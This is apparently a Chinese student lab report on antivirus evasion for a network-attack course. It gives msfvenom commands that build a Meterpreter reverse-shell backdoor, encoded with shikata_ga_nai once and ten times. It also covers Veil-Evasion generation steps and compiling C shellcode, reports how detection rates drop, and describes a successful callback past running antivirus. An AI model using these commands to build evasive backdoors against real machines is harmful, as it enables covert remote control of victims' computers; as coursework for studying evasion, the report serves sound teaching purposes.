20155338《网络对抗》Exp3 免杀原理与实践

实验过程

一、免杀效果参考基准

Kali使用上次实验msfvenom产生后门的可执行文件，上传到老师提供的网址http://www.virscan.org/上进行扫描，有48%的杀软报告病毒。

二、使用msf编码器

• 编码一次，在Kali输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe >后门名字.exe

结果被查出率降低了，可能是因为进行了编码的缘故，所以网站监测结果降低了 5个百分点。

• 多次编码，在Kali中输入命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe > 后门名字.exe

多次编码好像和第一次的结果差不多，恢复后依然放入网站检查。

三、使用Veil-Evasion重新编写源代码

• 这里直接使用的是老师的Kali，veil已经安装好。

• 在Kali的终端中启动Veil-Evasion

• 命令行中输入veil，后在veil中输入命令use evasion

• 依次输入如下命令生成你的可执行文件：
  use c/meterpreter/rev_tcp.py
  

• set LHOST Kali的IP
• set LPORT 端口号
• generate

• 可执行文件的文件名
  
  

扫描结果

四、C语言调用Shellcode

• 首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。
  

• 由VS编译运行生成一个.exe文件
  
  

• 之后放入网站进行检测，效果还比较客观，只有百分之20的被查出率
  

五、实测进行回连

• 按照上次实验用过的msf监听方法在Kali上打开监听，在Win主机开启杀软的情况下，运行最后生成的优化版exe文件，Kali成功获取了Win主机的权限